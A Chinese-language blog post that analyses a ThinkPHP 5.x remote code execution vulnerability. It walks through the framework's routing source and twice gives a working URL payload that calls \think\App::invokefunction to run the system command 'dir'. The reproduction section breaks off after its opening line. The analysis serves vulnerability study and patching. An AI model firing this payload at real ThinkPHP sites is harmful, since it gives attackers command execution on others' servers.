ThinkPHP5.x rec 漏洞分析与复现

漏洞分析与复现"/>

ThinkPHP5.x rec 漏洞分析与复现

.html?spm=5176.2020520001.1004.7.2e874bd363uLuf

先贴个漏洞预警,这里做一些内容摘要:

漏洞描述

由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。

影响版本

ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31

漏洞分析

我们从补丁上来对漏洞做一定的分析
5.0.x
再放一个5.0.20源码
下面使补丁中修改的内容

于是我们从 $ controller开始分析
补丁对$ controller的名称做了过滤,接着往下看代码:

这里对controller实例化,到Loader里看看:

    public static function controller($name, $layer = 'controller', $appendSuffix = false, $empty = ''){list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix);if (class_exists($class)) {return App::invokeClass($class);}if ($empty) {$emptyClass = self::parseClass($module, $layer, $empty, $appendSuffix);if (class_exists($emptyClass)) {return new $emptyClass(Request::instance());}}

大体意思就是如果这个类name存在就实例化,接着跟进getModuleAndClass:

    protected static function getModuleAndClass($name, $layer, $appendSuffix){if (false !== strpos($name, '\\')) {$module = Request::instance()->module(); $class  = $name;  } else {if (strpos($name, '/')) {list($module, $name) = explode('/', $name, 2);} else {$module = Request::instance()->module();}$class = self::parseClass($module, $layer, $name, $appendSuffix);}return [$module, $class]; }

这个函数会将module和class返回,用于实例化,利用命名空间的特点，如果可以控制此处,如果可以控制此处的class,也就是补丁里的controller，就可以实例化任意类。如果我们设置控制器为\think\App,可以构造payload调用其方法invokeFuction,

    public static function invokeFunction($function, $vars = []){$reflect = new \ReflectionFunction($function);$args    = self::bindParams($reflect, $vars);// 记录执行信息self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');return $reflect->invokeArgs($args);}

\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

接下来就是如何设置controller为\think\App

$controller = strip_tags($result[1] ?: $config['default_controller']);

其中把result[1]的值传递到$ control中,

public static function module($result, $config, $convert = null)

接着找在哪里用了module方法,

protected static function exec($dispatch, $config){...$data = self::module($dispatch['module'],$config,isset($dispatch['convert']) ? $dispatch['convert'] : null);...
}

可以看到$ resule来自$ dispatch[‘module’],接着往前翻

public static function run(Request $request = null){...$dispatch = self::$dispatch;if (empty($dispatch)) {$dispatch = self::routeCheck($request, $config);}...$data = self::exec($dispatch, $config);...
}

追routeCheck

    public static function routeCheck($request, array $config){...$result = Route::check($request, $path, $depr, $config['url_domain_deploy']);...}

到Route中可以发现解析URL并没有进行安全检测
从Request::path()追到pathinfo()

    public function pathinfo(){if (is_null($this->pathinfo)) {if (isset($_GET[Config::get('var_pathinfo')])) {// 判断URL里面是否有兼容模式参数$_SERVER['PATH_INFO'] = $_GET[Config::get('var_pathinfo')];unset($_GET[Config::get('var_pathinfo')]);} elseif (IS_CLI) {// CLI模式下 index.php module/controller/action/params/...$_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';}// 分析PATHINFO信息if (!isset($_SERVER['PATH_INFO'])) {foreach (Config::get('pathinfo_fetch') as $type) {if (!empty($_SERVER[$type])) {$_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME'])) ?substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type];break;}}}$this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/');}return $this->pathinfo;}

var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参
于是构造payload

?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

漏洞复现:

在本地临时搭搭建了版本为5.0.22的tp:

~~